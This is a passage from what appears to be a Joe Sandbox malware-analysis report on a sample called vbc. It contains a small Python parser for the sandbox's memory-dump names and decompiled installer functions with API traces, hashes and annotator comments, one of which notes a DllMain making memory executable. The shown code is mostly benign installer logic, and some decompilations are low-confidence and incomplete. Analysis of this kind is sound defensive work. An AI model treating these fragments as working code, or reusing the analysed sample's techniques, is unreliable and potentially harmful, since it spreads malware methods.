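    r"^(?P<pid>[0-9a-f]{8})\.(?P<round>[0-9a-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<flag>[0-9a-f]{8})\."
    r"(?P<type>[0-9a-f]{8})\.(?P<module>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


def parse_sdmp_name(name: str) -> DumpRegion:
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    protect = int(m["protect"], 16)
    region_type = int(m["type"], 16)
    return DumpRegion(
        pid=int(m["pid"], 16),
        base=int(m["base"], 16),
        protect=decode_protect(protect),
        region_type=MEM_TYPE.get(region_type, f"0x{region_type:x}"),
        executable=bool(protect & 0xF0),  # any PAGE_EXECUTE* base protection
        raw=name.strip(),
    )


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int


# Matches "GetLastError.KERNEL32 ref: 00405ADC" as well as
# "ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060A1"
API_RE = re.compile(
    r"^(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


def parse_api_line(line: str) -> ApiCall:
    m = API_RE.match(line.strip().lstrip("•").strip())
    if not m:
        raise ValueError(f"not an API trace line: {line!r}")
    args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16))


def summarize_function(record: str) -> dict:
    """Collect the API calls and dump regions of one function record."""
    apis, regions = [], []
    for line in record.splitlines():
        line = line.strip().lstrip("•").strip()
        if ".sdmp" in line:  # "Source File: ..." and "Associated: ..." lines
            regions.append(parse_sdmp_name(re.search(r"(\S+\.sdmp)", line).group(1)))
        elif "ref:" in line:  # API trace lines
            apis.append(parse_api_line(line))
    return {"apis": apis, "regions": regions,
            "executable_regions": [r for r in regions if r.executable]}


# Constructed sample: lines copied from the E00405AC8 record on this page.
SAMPLE_RECORD = r"""
• CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
• GetLastError.KERNEL32 ref: 00405ADC
• Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
"""

if __name__ == "__main__":
    for r in summarize_function(SAMPLE_RECORD)["regions"]:
        print(f"pid={r.pid} base=0x{r.base:x} {r.protect} {r.region_type} exec={r.executable}")
```

Run over a whole report, the executable-region filter is the quick way to see which dumps are worth disassembling (here only the 0x401000 .text region of the module at 0x400000), and decode_protect makes the W^X flip in the DllMain explicit: the data bytes at 0x734f505c go from the module's normal protection to PAGE_EXECUTE_READWRITE.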

                    C-Code - Quality: 100%
                    			E004044C2(int _a4) { // send message _a4 (no parameters) to the window whose handle is kept in the global at 0x7a7a38; no-op while that handle is still NULL
                    				struct HWND__* _t2;
                    				long _t3;
                    
                    				_t2 =  *0x7a7a38;
                    				if(_t2 != 0) {
                    					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                    					return _t3;
                    				}
                    				return _t2; // NULL
                    			}





                    Instruction addresses: 0x004044c2, 0x004044c9, 0x004044d4, 0x00000000, 0x004044d4, 0x004044da

                    APIs
                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: the same 13 regions of the module at 00400000 as listed in the first Memory Dump Source block above
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                    • Instruction ID: ac3b44bde4cff7d728b8f73da7dc3c4418e617d20a2d9e9616a9aba5531653cc
                    • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                    • Instruction Fuzzy Hash: 4FC04C75744600BAEA148F549E45F0677546790701F14C429B641B54D0CA74D410DA2C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004034C2(long _a4) { // seek the file handle kept in the global at 0x40a018 to absolute offset _a4 (dwMoveMethod 0 = FILE_BEGIN)
                    				long _t2;
                    
                    				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                    				return _t2; // new file position, or INVALID_SET_FILE_POINTER on failure
                    			}




                    Instruction addresses: 0x004034d0, 0x004034d6

                    APIs
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040385A,?), ref: 004034D0
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: the same 13 regions of the module at 00400000 as listed in the first Memory Dump Source block above
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                    • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                    • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                    • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004044AB(int _a4) { // move dialog focus: 0x28 is WM_NEXTDLGCTL, lParam 1 means wParam (_a4) is the handle of the control to focus; the dialog handle comes from the global at 0x7a8a68
                    				long _t2;
                    
                    				_t2 = SendMessageW( *0x7a8a68, 0x28, _a4, 1); // executed
                    				return _t2;
                    			}




                    Instruction addresses: 0x004044b9, 0x004044bf

                    APIs
                    • SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: the same 13 regions of the module at 00400000 as listed in the first Memory Dump Source block above
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                    • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                    • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                    • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00404498(int _a4) { // enable (_a4 != 0) or disable the window whose handle is kept in the global at 0x7a1f44; the API trace below resolves the call to KiUserCallbackDispatcher.NTDLL, the user-mode callback path user32 takes for this window-state change
                    				int _t2;
                    
                    				_t2 = EnableWindow( *0x7a1f44, _a4); // executed
                    				return _t2;
                    			}




                    Instruction addresses: 0x004044a2, 0x004044a8

                    APIs
                    • KiUserCallbackDispatcher.NTDLL(?,0040426F), ref: 004044A2
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: the same 13 regions of the module at 00400000 as listed in the first Memory Dump Source block above
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CallbackDispatcherUser
                    • String ID:
                    • API String ID: 2492992576-0
                    • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                    • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                    • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                    • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 51%
                    			E734F2B98(void* __ecx, intOrPtr _a4) { // low-confidence decompilation (51%): appears to push _a4 onto and pop from a singly linked list headed at the global 0x734f5058, closes a handle whose argument the decompiler could not recover (marked ??), and leaves counted loops as raw asm("loop ...") fragments; _t68 and _t107 are decompiler temporaries emitted without declarations
                    				signed int _v8;
                    				void* _t28;
                    				void* _t29;
                    				int _t33;
                    				void* _t37;
                    				void* _t40;
                    				void* _t45;
                    				void* _t49;
                    				signed int _t56;
                    				void* _t61;
                    				void* _t70;
                    				intOrPtr _t72;
                    				signed int _t77;
                    				intOrPtr _t79;
                    				intOrPtr _t80;
                    				void* _t81;
                    				void* _t87;
                    				void* _t88;
                    				void* _t89;
                    				void* _t90;
                    				intOrPtr _t93;
                    				intOrPtr _t94;
                    
                    				if( *0x734f5050 != 0 && E734F2ADB(_a4) == 0) {
                    					 *0x734f5054 = _t93;
                    					if( *0x734f504c != 0) {
                    						_t93 =  *0x734f504c;
                    					} else {
                    						E734F30C0(E734F2AD5(), __ecx);
                    						 *0x734f504c = _t93;
                    					}
                    				}
                    				_t28 = E734F2B09(_a4);
                    				_t94 = _t93 + 4;
                    				if(_t28 <= 0) {
                    					L9:
                    					_t29 = E734F2AFD();
                    					_t72 = _a4;
                    					_t79 =  *0x734f5058;
                    					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                    					 *0x734f5058 = _t72;
                    					E734F2AF7();
                    					_t33 = CloseHandle(??); // executed; handle argument not recovered by the decompiler
                    					 *0x734f5034 = _t33;
                    					 *0x734f5038 = _t79;
                    					if( *0x734f5050 != 0 && E734F2ADB( *0x734f5058) == 0) {
                    						 *0x734f504c = _t94;
                    						_t94 =  *0x734f5054;
                    					}
                    					_t80 =  *0x734f5058;
                    					_a4 = _t80;
                    					 *0x734f5058 =  *((intOrPtr*)(E734F2AFD() + _t80));
                    					_t37 = E734F2AE9(_t80);
                    					_pop(_t81);
                    					if(_t37 != 0) {
                    						_t40 = E734F2B09(_t81);
                    						if(_t40 > 0) {
                    							_push(_t40);
                    							_push(E734F2B14() + _a4 + _v8);
                    							_push(E734F2B1E());
                    							if( *0x734f5050 <= 0 || E734F2ADB(_a4) != 0) {
                    								_pop(_t88);
                    								_pop(_t45);
                    								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                    								if(__eflags == 0) {
                    								}
                    								asm("loop 0xfffffff5");
                    							} else {
                    								_pop(_t89);
                    								_pop(_t49);
                    								 *0x734f504c =  *0x734f504c +  *(_t89 + _t49) * 4;
                    								asm("loop 0xffffffeb");
                    							}
                    						}
                    					}
                    					_t107 =  *0x734f5058;
                    					if( *0x734f5058 == 0) {
                    						 *0x734f504c = 0;
                    					}
                    					E734F2B42(_t107, _a4,  *0x734f5034,  *0x734f5038);
                    					return _a4;
                    				}
                    				_push(E734F2B14() + _a4);
                    				_t56 = E734F2B1A();
                    				_v8 = _t56;
                    				_t77 = _t28;
                    				_push(_t68 + _t56 * _t77);
                    				_t70 = E734F2B26();
                    				_t87 = E734F2B22();
                    				_t90 = E734F2B1E();
                    				_t61 = _t77;
                    				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                    					_push( *((intOrPtr*)(_t70 + _t61)));
                    				}
                    				_push( *((intOrPtr*)(_t87 + _t61)));
                    				asm("loop 0xfffffff1");
                    				goto L9;
                    			}

                    0x734f2ba8
                    0x734f2bb9
                    0x734f2bc6
                    0x734f2bda
                    0x734f2bc8
                    0x734f2bcd
                    0x734f2bd2
                    0x734f2bd2
                    0x734f2bc6
                    0x734f2be3
                    0x734f2be8
                    0x734f2bee
                    0x734f2c32
                    0x734f2c32
                    0x734f2c37
                    0x734f2c3c
                    0x734f2c42
                    0x734f2c44
                    0x734f2c4a
                    0x734f2c57
                    0x734f2c59
                    0x734f2c5e
                    0x734f2c6b
                    0x734f2c7e
                    0x734f2c84
                    0x734f2c8a
                    0x734f2c8b
                    0x734f2c91
                    0x734f2c9d
                    0x734f2ca3
                    0x734f2cab
                    0x734f2cac
                    0x734f2caf
                    0x734f2cba
                    0x734f2cbc
                    0x734f2cc8
                    0x734f2cce
                    0x734f2cd6
                    0x734f2d02
                    0x734f2d03
                    0x734f2d05
                    0x734f2d09
                    0x734f2d09
                    0x734f2d10
                    0x734f2ce6
                    0x734f2ce6
                    0x734f2ce7
                    0x734f2cf5
                    0x734f2cfe
                    0x734f2cfe
                    0x734f2cd6
                    0x734f2cba
                    0x734f2d12
                    0x734f2d19
                    0x734f2d1b
                    0x734f2d1b
                    0x734f2d34
                    0x734f2d42
                    0x734f2d42
                    0x734f2bf9
                    0x734f2bfa
                    0x734f2bff
                    0x734f2c03
                    0x734f2c08
                    0x734f2c1c
                    0x734f2c1d
                    0x734f2c1e
                    0x734f2c20
                    0x734f2c25
                    0x734f2c27
                    0x734f2c27
                    0x734f2c2a
                    0x734f2c30
                    0x00000000

                    APIs
                    • CloseHandle.KERNELBASE(00000000), ref: 734F2C57
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: CloseHandle
                    • String ID:
                    • API String ID: 2962429428-0
                    • Opcode ID: e7de7b7b0c7ae93f4be26a83b2215c45bde418c996473e92cb2df22f5216d605
                    • Instruction ID: 3008c4729daa29f1805bfd2638cc72c0db86409091a07e19f0e7cfeae9e7f6e5
                    • Opcode Fuzzy Hash: e7de7b7b0c7ae93f4be26a83b2215c45bde418c996473e92cb2df22f5216d605
                    • Instruction Fuzzy Hash: C641B4BA90030FEFEB1DEF65D840B4937B9EB04310F3C846AE809E6240D6399591CBD9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004014D7(intOrPtr __edx) {
                    				long _t3;
                    				void* _t7;
                    				intOrPtr _t10;
                    				void* _t13;
                    
                    				_t10 = __edx;
                    				_t3 = E00402D84(_t7);
                    				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                    				if(_t3 <= 1) {
                    					_t3 = 1;
                    				}
                    				Sleep(_t3); // executed
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t13 - 4));
                    				return 0;
                    			}

                    0x004014d7
                    0x004014d8
                    0x004014e1
                    0x004014e4
                    0x004014e8
                    0x004014e8
                    0x004014ea
                    0x00402c2d
                    0x00402c39

                    APIs
                    • Sleep.KERNELBASE(00000000), ref: 004014EA
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 37e8cdb3e959b6eccc3643533ee898bd9fefd3c7d67a49354a1a021ca5fec273
                    • Instruction ID: 3b5dc4dfeaf44569f9deb2ecf0de9c371932af0cf72a0f4646a25a2108455337
                    • Opcode Fuzzy Hash: 37e8cdb3e959b6eccc3643533ee898bd9fefd3c7d67a49354a1a021ca5fec273
                    • Instruction Fuzzy Hash: E0D05E73A141018BD704EBB8BE8545E73A8EB503193208C37D402E1091EA7888564618
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E734F12BB() {
                    				void* _t3;
                    
                    				_t3 = GlobalAlloc(0x40,  *0x734f506c +  *0x734f506c); // executed
                    				return _t3;
                    			}

                    0x734f12c5
                    0x734f12cb

                    APIs
                    • GlobalAlloc.KERNELBASE(00000040,?,734F12DB,?,734F137F,00000019,734F11CA,-000000A0), ref: 734F12C5
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: AllocGlobal
                    • String ID:
                    • API String ID: 3761449716-0
                    • Opcode ID: 9abd62e683059c3f883a8de7731000c3b8e241a558b507abbd516b4cd8cf727e
                    • Instruction ID: a5d55a0a2c86de2687b112a5e5bf2a3379e8158191361fea0eaf8438d5e8535e
                    • Opcode Fuzzy Hash: 9abd62e683059c3f883a8de7731000c3b8e241a558b507abbd516b4cd8cf727e
                    • Instruction Fuzzy Hash: 4BB012B2A00001FFEE04AB65CC06F3432D4E700301F1C4040F608F0280C52049208534
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E00404967(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				signed int _v12;
                    				long _v16;
                    				long _v20;
                    				long _v24;
                    				char _v28;
                    				intOrPtr _v32;
                    				long _v36;
                    				char _v40;
                    				unsigned int _v44;
                    				signed int _v48;
                    				WCHAR* _v56;
                    				intOrPtr _v60;
                    				intOrPtr _v64;
                    				intOrPtr _v68;
                    				WCHAR* _v72;
                    				void _v76;
                    				struct HWND__* _v80;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t82;
                    				long _t87;
                    				short* _t89;
                    				void* _t95;
                    				signed int _t96;
                    				int _t109;
                    				signed short _t114;
                    				signed int _t118;
                    				struct HWND__** _t122;
                    				intOrPtr* _t138;
                    				WCHAR* _t146;
                    				unsigned int _t150;
                    				signed int _t152;
                    				unsigned int _t156;
                    				signed int _t158;
                    				signed int* _t159;
                    				signed int* _t160;
                    				struct HWND__* _t166;
                    				struct HWND__* _t167;
                    				int _t169;
                    				unsigned int _t197;
                    
                    				_t156 = __edx;
                    				_t82 =  *0x7a0f20; // 0x9f0f84
                    				_v32 = _t82;
                    				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
                    				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                    				if(_a8 == 0x40b) {
                    					E00405B5E(0x3fb, _t146);
                    					E004067A1(_t146);
                    				}
                    				_t167 = _a4;
                    				if(_a8 != 0x110) {
                    					L8:
                    					if(_a8 != 0x111) {
                    						L20:
                    						if(_a8 == 0x40f) {
                    							L22:
                    							_v8 = _v8 & 0x00000000;
                    							_v12 = _v12 & 0x00000000;
                    							E00405B5E(0x3fb, _t146);
                    							if(E00405EF1(_t186, _t146) == 0) {
                    								_v8 = 1;
                    							}
                    							E0040651A(0x79ff18, _t146);
                    							_t87 = E004068E7(1);
                    							_v16 = _t87;
                    							if(_t87 == 0) {
                    								L30:
                    								E0040651A(0x79ff18, _t146);
                    								_t89 = E00405E94(0x79ff18);
                    								_t158 = 0;
                    								if(_t89 != 0) {
                    									 *_t89 = 0;
                    								}
                    								if(GetDiskFreeSpaceW(0x79ff18,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                    									goto L35;
                    								} else {
                    									_t169 = 0x400;
                    									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                    									asm("cdq");
                    									_v48 = _t109;
                    									_v44 = _t156;
                    									_v12 = 1;
                    									goto L36;
                    								}
                    							} else {
                    								_t159 = 0;
                    								if(0 == 0x79ff18) {
                    									goto L30;
                    								} else {
                    									goto L26;
                    								}
                    								while(1) {
                    									L26:
                    									_t114 = _v16(0x79ff18,  &_v48,  &_v28,  &_v40);
                    									if(_t114 != 0) {
                    										break;
                    									}
                    									if(_t159 != 0) {
                    										 *_t159 =  *_t159 & _t114;
                    									}
                    									_t160 = E00405E35(0x79ff18);
                    									 *_t160 =  *_t160 & 0x00000000;
                    									_t159 = _t160;
                    									 *_t159 = 0x5c;
                    									if(_t159 != 0x79ff18) {
                    										continue;
                    									} else {
                    										goto L30;
                    									}
                    								}
                    								_t150 = _v44;
                    								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                    								_v44 = _t150 >> 0xa;
                    								_v12 = 1;
                    								_t158 = 0;
                    								__eflags = 0;
                    								L35:
                    								_t169 = 0x400;
                    								L36:
                    								_t95 = E00404E04(5);
                    								if(_v12 != _t158) {
                    									_t197 = _v44;
                    									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                    										_v8 = 2;
                    									}
                    								}
                    								if( *((intOrPtr*)( *0x7a7a3c + 0x10)) != _t158) {
                    									E00404DEC(0x3ff, 0xfffffffb, _t95);
                    									if(_v12 == _t158) {
                    										SetDlgItemTextW(_a4, _t169, 0x79ff08);
                    									} else {
                    										E00404D23(_t169, 0xfffffffc, _v48, _v44);
                    									}
                    								}
                    								_t96 = _v8;
                    								 *0x7a8b04 = _t96;
                    								if(_t96 == _t158) {
                    									_v8 = E0040140B(7);
                    								}
                    								if(( *(_v32 + 0x14) & _t169) != 0) {
                    									_v8 = _t158;
                    								}
                    								E00404498(0 | _v8 == _t158);
                    								if(_v8 == _t158 &&  *0x7a1f38 == _t158) {
                    									E004048C0();
                    								}
                    								 *0x7a1f38 = _t158;
                    								goto L53;
                    							}
                    						}
                    						_t186 = _a8 - 0x405;
                    						if(_a8 != 0x405) {
                    							goto L53;
                    						}
                    						goto L22;
                    					}
                    					_t118 = _a12 & 0x0000ffff;
                    					if(_t118 != 0x3fb) {
                    						L12:
                    						if(_t118 == 0x3e9) {
                    							_t152 = 7;
                    							memset( &_v76, 0, _t152 << 2);
                    							_v80 = _t167;
                    							_v72 = 0x7a1f48;
                    							_v60 = E00404CBD;
                    							_v56 = _t146;
                    							_v68 = E00406557(_t146, 0x7a1f48, _t167, 0x7a0720, _v12);
                    							_t122 =  &_v80;
                    							_v64 = 0x41;
                    							__imp__SHBrowseForFolderW(_t122);
                    							if(_t122 == 0) {
                    								_a8 = 0x40f;
                    							} else {
                    								__imp__CoTaskMemFree(_t122);
                    								E00405DE9(_t146);
                    								_t125 =  *((intOrPtr*)( *0x7a8a70 + 0x11c));
                    								if( *((intOrPtr*)( *0x7a8a70 + 0x11c)) != 0 && _t146 == 0x7b3800) {
                    									E00406557(_t146, 0x7a1f48, _t167, 0, _t125);
                    									if(lstrcmpiW(0x7a6a00, 0x7a1f48) != 0) {
                    										lstrcatW(_t146, 0x7a6a00);
                    									}
                    								}
                    								 *0x7a1f38 =  *0x7a1f38 + 1;
                    								SetDlgItemTextW(_t167, 0x3fb, _t146);
                    							}
                    						}
                    						goto L20;
                    					}
                    					if(_a12 >> 0x10 != 0x300) {
                    						goto L53;
                    					}
                    					_a8 = 0x40f;
                    					goto L12;
                    				} else {
                    					_t166 = GetDlgItem(_t167, 0x3fb);
                    					if(E00405E60(_t146) != 0 && E00405E94(_t146) == 0) {
                    						E00405DE9(_t146);
                    					}
                    					 *0x7a7a38 = _t167;
                    					SetWindowTextW(_t166, _t146);
                    					_push( *((intOrPtr*)(_a16 + 0x34)));
                    					_push(1);
                    					E00404476(_t167);
                    					_push( *((intOrPtr*)(_a16 + 0x30)));
                    					_push(0x14);
                    					E00404476(_t167);
                    					E004044AB(_t166);
                    					_t138 = E004068E7(8);
                    					if(_t138 == 0) {
                    						L53:
                    						return E004044DD(_a8, _a12, _a16);
                    					} else {
                    						 *_t138(_t166, 1);
                    						goto L8;
                    					}
                    				}
                    			}

                    0x00404967
                    0x0040496d
                    0x00404973
                    0x00404980
                    0x0040498e
                    0x00404991
                    0x00404999
                    0x0040499f
                    0x0040499f
                    0x004049ab
                    0x004049ae
                    0x00404a1c
                    0x00404a23
                    0x00404afa
                    0x00404b01
                    0x00404b10
                    0x00404b10
                    0x00404b14
                    0x00404b1e
                    0x00404b2b
                    0x00404b2d
                    0x00404b2d
                    0x00404b3b
                    0x00404b42
                    0x00404b49
                    0x00404b4c
                    0x00404b88
                    0x00404b8a
                    0x00404b90
                    0x00404b95
                    0x00404b99
                    0x00404b9b
                    0x00404b9b
                    0x00404bb7
                    0x00000000
                    0x00404bb9
                    0x00404bbc
                    0x00404bca
                    0x00404bd0
                    0x00404bd1
                    0x00404bd4
                    0x00404bd7
                    0x00000000
                    0x00404bd7
                    0x00404b4e
                    0x00404b50
                    0x00404b54
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404b56
                    0x00404b56
                    0x00404b63
                    0x00404b68
                    0x00000000
                    0x00000000
                    0x00404b6c
                    0x00404b6e
                    0x00404b6e
                    0x00404b77
                    0x00404b79
                    0x00404b7e
                    0x00404b81
                    0x00404b86
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404b86
                    0x00404be3
                    0x00404bed
                    0x00404bf0
                    0x00404bf3
                    0x00404bfa
                    0x00404bfa
                    0x00404bfc
                    0x00404bfc
                    0x00404c01
                    0x00404c03
                    0x00404c0b
                    0x00404c12
                    0x00404c14
                    0x00404c1f
                    0x00404c1f
                    0x00404c14
                    0x00404c2f
                    0x00404c39
                    0x00404c41
                    0x00404c5c
                    0x00404c43
                    0x00404c4c
                    0x00404c4c
                    0x00404c41
                    0x00404c61
                    0x00404c66
                    0x00404c6b
                    0x00404c74
                    0x00404c74
                    0x00404c7d
                    0x00404c7f
                    0x00404c7f
                    0x00404c8b
                    0x00404c93
                    0x00404c9d
                    0x00404c9d
                    0x00404ca2
                    0x00000000
                    0x00404ca2
                    0x00404b4c
                    0x00404b03
                    0x00404b0a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404b0a
                    0x00404a29
                    0x00404a32
                    0x00404a4c
                    0x00404a51
                    0x00404a5b
                    0x00404a62
                    0x00404a6e
                    0x00404a71
                    0x00404a74
                    0x00404a7b
                    0x00404a83
                    0x00404a86
                    0x00404a8a
                    0x00404a91
                    0x00404a99
                    0x00404af3
                    0x00404a9b
                    0x00404a9c
                    0x00404aa3
                    0x00404aad
                    0x00404ab5
                    0x00404ac2
                    0x00404ad6
                    0x00404ada
                    0x00404ada
                    0x00404ad6
                    0x00404adf
                    0x00404aec
                    0x00404aec
                    0x00404a99
                    0x00000000
                    0x00404a51
                    0x00404a3f
                    0x00000000
                    0x00000000
                    0x00404a45
                    0x00000000
                    0x004049b0
                    0x004049bd
                    0x004049c6
                    0x004049d3
                    0x004049d3
                    0x004049da
                    0x004049e0
                    0x004049e9
                    0x004049ec
                    0x004049ef
                    0x004049f7
                    0x004049fa
                    0x004049fd
                    0x00404a03
                    0x00404a0a
                    0x00404a11
                    0x00404ca8
                    0x00404cba
                    0x00404a17
                    0x00404a1a
                    0x00000000
                    0x00404a1a
                    0x00404a11

                    APIs
                    • GetDlgItem.USER32(?,000003FB), ref: 004049B6
                    • SetWindowTextW.USER32 ref: 004049E0
                    • SHBrowseForFolderW.SHELL32(?), ref: 00404A91
                    • CoTaskMemFree.OLE32(00000000), ref: 00404A9C
                    • lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 00404ACE
                    • lstrcatW.KERNEL32 ref: 00404ADA
                    • SetDlgItemTextW.USER32 ref: 00404AEC
                      • Part of subcall function 00405B5E: GetDlgItemTextW.USER32 ref: 00405B71
